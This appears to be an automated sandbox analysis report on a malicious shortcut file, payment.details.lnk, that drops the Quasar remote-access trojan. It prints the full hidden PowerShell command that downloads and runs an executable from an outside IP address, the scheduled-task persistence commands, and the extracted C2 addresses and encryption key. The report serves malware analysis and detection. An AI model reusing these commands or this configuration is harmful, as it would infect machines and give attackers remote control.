Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-11-2024 19:25
Static task
static1
Behavioral task
behavioral1
Sample
payment.details.lnk
Resource
win7-20240903-en
General
-
Target
payment.details.lnk
-
Size
2KB
-
MD5
4a98c5bbf1a94992ec72858d3327a28e
-
SHA1
0fa914c44bdcb63d3631d5ec30cebb5047d12c7a
-
SHA256
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543
-
SHA512
e60fb58d1f141d3c2ea99bf39d3b0dd872bebc05efa0cfa630e783f4d90b624084988c66621adc4d7dc6434b1c707d1d6c7c1f36ee2fa2e36fefc47b9a7d6ba7
Malware Config
Extracted
http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted
quasar
1.3.0.0
VTROY
31.13.224.12:61512
31.13.224.13:61513
QSR_MUTEX_4Q2rJqiVyC7hohzbjx
-
encryption_key
7Vp2dMCHrMjJthQ2Elyy
-
install_name
downloads.exe
-
log_directory
Logs
-
reconnect_delay
5000
-
startup_key
cssrse.exe
-
subdirectory
downloadupdates
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4240-28-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 7 1108 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 8 IoCs
Processes:
ujtjewc.exeujtjewc.exeujtjewc.exeujtjewc.exedownloads.exedownloads.exedownloads.exedownloads.exepid Process 1788 ujtjewc.exe 4240 ujtjewc.exe 3444 ujtjewc.exe 968 ujtjewc.exe 4520 downloads.exe 2172 downloads.exe 3740 downloads.exe 4456 downloads.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
ujtjewc.exedownloads.exedescription pid Process procid_target PID 1788 set thread context of 4240 1788 ujtjewc.exe 93 PID 1788 set thread context of 3444 1788 ujtjewc.exe 94 PID 1788 set thread context of 968 1788 ujtjewc.exe 95 PID 4520 set thread context of 2172 4520 downloads.exe 101 PID 4520 set thread context of 3740 4520 downloads.exe 102 PID 4520 set thread context of 4456 4520 downloads.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
downloads.exedownloads.exeujtjewc.exeujtjewc.exeujtjewc.exeschtasks.exedownloads.exedownloads.exeschtasks.exeujtjewc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 4516 schtasks.exe 3360 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 1108 powershell.exe 1108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeujtjewc.exeujtjewc.exedownloads.exedownloads.exedescription pid Process Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 1788 ujtjewc.exe Token: SeDebugPrivilege 3444 ujtjewc.exe Token: SeDebugPrivilege 4520 downloads.exe Token: SeDebugPrivilege 4456 downloads.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
cmd.exepowershell.exeujtjewc.exeujtjewc.exedownloads.exedownloads.exedescription pid Process procid_target PID 4172 wrote to memory of 1108 4172 cmd.exe 85 PID 4172 wrote to memory of 1108 4172 cmd.exe 85 PID 1108 wrote to memory of 1788 1108 powershell.exe 89 PID 1108 wrote to memory of 1788 1108 powershell.exe 89 PID 1108 wrote to memory of 1788 1108 powershell.exe 89 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 4240 1788 ujtjewc.exe 93 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 3444 1788 ujtjewc.exe 94 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 1788 wrote to memory of 968 1788 ujtjewc.exe 95 PID 3444 wrote to memory of 4516 3444 ujtjewc.exe 98 PID 3444 wrote to memory of 4516 3444 ujtjewc.exe 98 PID 3444 wrote to memory of 4516 3444 ujtjewc.exe 98 PID 3444 wrote to memory of 4520 3444 ujtjewc.exe 100 PID 3444 wrote to memory of 4520 3444 ujtjewc.exe 100 PID 3444 wrote to memory of 4520 3444 ujtjewc.exe 100 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 2172 4520 downloads.exe 101 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 3740 4520 downloads.exe 102 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4520 wrote to memory of 4456 4520 downloads.exe 103 PID 4456 wrote to memory of 3360 4456 downloads.exe 105 PID 4456 wrote to memory of 3360 4456 downloads.exe 105 PID 4456 wrote to memory of 3360 4456 downloads.exe 105
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\payment.details.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ujtjewc.exe');./'ujtjewc.exe';(get-item 'ujtjewc.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4240
-
-
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4516
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2172
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3740
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe" /rl HIGHEST /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3360
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:968
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
522B
MD50f39d6b9afc039d81ff31f65cbf76826
SHA18356d04fe7bba2695d59b6caf5c59f58f3e1a6d8
SHA256ea16b63ffd431ebf658b903710b6b3a9b8a2eb6814eee3a53b707a342780315d
SHA5125bad54adb2e32717ef6275f49e2f101dd7e2011c9be14a32e5c29051e8a3f608cbd0b44ac4855ab21e790cb7a5d84c5f69de087074fd01b35259d34d07f5aaf9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
773KB
MD58fb841a089ce2c1c760ef67e5bde9a08
SHA19ba26c8f25a276a87175ae9eac909a8f4d97fd71
SHA256a0fb85dec00548f95f3db18f567bcb75a9a083eebb637be6c88c2d2bf05e2a35
SHA512a16739df2c02ea5e2116e1f2283a0f57d0a57e52431fa746c3334df20fbb4e96db6d1c4c5ed47cb92cb491afcd170794a0b31bde1180cff13caaaa9be59aa8e4